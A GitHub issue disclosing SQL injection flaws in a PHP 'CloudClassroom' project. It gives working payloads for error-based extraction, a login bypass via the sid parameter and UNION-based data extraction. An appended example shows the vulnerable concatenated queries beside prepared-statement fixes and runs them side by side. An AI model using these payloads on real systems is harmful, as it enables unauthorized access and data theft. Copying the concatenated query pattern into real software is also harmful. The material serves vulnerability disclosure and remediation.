
SQL Injection

Open carlosalbertotuma opened this issue 4 months ago • 0 comments

PoC 1 - SQL Injection Error Based

The vulnerable endpoint:

http:///CloudClassroom-PHP-Project-master/postquerypublic

POST: gnamex

Original SQL code (from source):

$sql = "INSERT INTO query(Query, Eid) VALUES ('$tempsquery','$tempseid')";

Because the input is not sanitized, attackers can inject SQL like:

a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1


PoC 2 - SQL Injection Bypass Authentication

POST /classrooms/loginlinkstudent

Presentation: SQL Injection Bypass Authentication via POST sid parameter

Example vulnerable query (simplified):

SELECT * FROM students WHERE sid = '$sid' AND pass = '$pass';

By injecting SQL in sid, the attacker can manipulate the query logic to always evaluate to true, bypassing login.

Example full POST request (payload URL-encoded):

sid=1' or 1=1-- -&pass=a&login=


PoC 3 - SQL Injection Union Based

GET /classrooms/viewresult.php

After the bypass, we can access viewresult.php via GET. The endpoint is also subject to SQL injection, and we can extract data via UNION-based SQL injection.

http://URL/classrooms/viewresult.php?seno=%27%20UNION%20SELECT%201,database(),3,4%20--%20-


  • https://github.com/carlosalbertotuma/CLOUD-CLASSROOMS-php-1.0
  • https://github.com/carlosalbertotuma/Cloud-Classroom-PHP-1.0---Poc2

carlosalbertotuma, Jul 23 '25 15:07
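The fix for the query patterns reported above, as an added example that is not part of the original issue or the project's code: the concatenated login query from PoC 2 next to a prepared-statement version, plus the PoC 1 INSERT with bound parameters. Table and column names follow the queries quoted in the issue; the in-memory SQLite database, the sample row, the function names and the switch to hashed passwords are assumptions made for the illustration.

```php
<?php
// Added illustration, not the project's code. Schema follows the simplified
// queries quoted in the issue; the SQLite in-memory DB and row are constructed.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE students (sid TEXT PRIMARY KEY, pass TEXT)");
$db->exec("CREATE TABLE query (Query TEXT, Eid TEXT)");
$seed = $db->prepare("INSERT INTO students (sid, pass) VALUES (?, ?)");
$seed->execute(['s1001', password_hash('correct horse', PASSWORD_DEFAULT)]);

// Pattern from the issue: request values are concatenated into the SQL text,
// so a quote in $sid changes the structure of the statement.
function loginConcatenated(PDO $db, string $sid, string $pass): bool {
    $sql = "SELECT * FROM students WHERE sid = '$sid' AND pass = '$pass'";
    return $db->query($sql)->fetch() !== false;
}

// Hardened: sid is bound as data and never parsed as SQL; the password is
// compared with password_verify() against a stored hash (assumed change).
function loginPrepared(PDO $db, string $sid, string $pass): bool {
    $stmt = $db->prepare("SELECT pass FROM students WHERE sid = :sid");
    $stmt->execute([':sid' => $sid]);
    $hash = $stmt->fetchColumn();          // false when no row matches
    return is_string($hash) && password_verify($pass, $hash);
}

// Same fix for the INSERT quoted in PoC 1: both values are bound parameters.
function saveQuery(PDO $db, string $query, string $eid): void {
    $stmt = $db->prepare("INSERT INTO query (Query, Eid) VALUES (:q, :eid)");
    $stmt->execute([':q' => $query, ':eid' => $eid]);
}

$pocSid = "1' or 1=1-- -";                  // sid value from the issue's PoC 2
$pocQuery = "a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1";

echo "concatenated login with PoC sid: ";
var_dump(loginConcatenated($db, $pocSid, 'a'));
echo "prepared login with PoC sid:     ";
var_dump(loginPrepared($db, $pocSid, 'a'));
echo "prepared login, valid account:   ";
var_dump(loginPrepared($db, 's1001', 'correct horse'));

// With binding, the PoC 1 string is stored as inert text, byte for byte.
saveQuery($db, $pocQuery, 'e42');
$stored = $db->query("SELECT Query FROM query")->fetchColumn();
echo "stored text equals submitted text: ";
var_dump($stored === $pocQuery);
```

On MySQL, also set `PDO::ATTR_EMULATE_PREPARES` to `false` so the driver uses server-side prepared statements instead of client-side emulation.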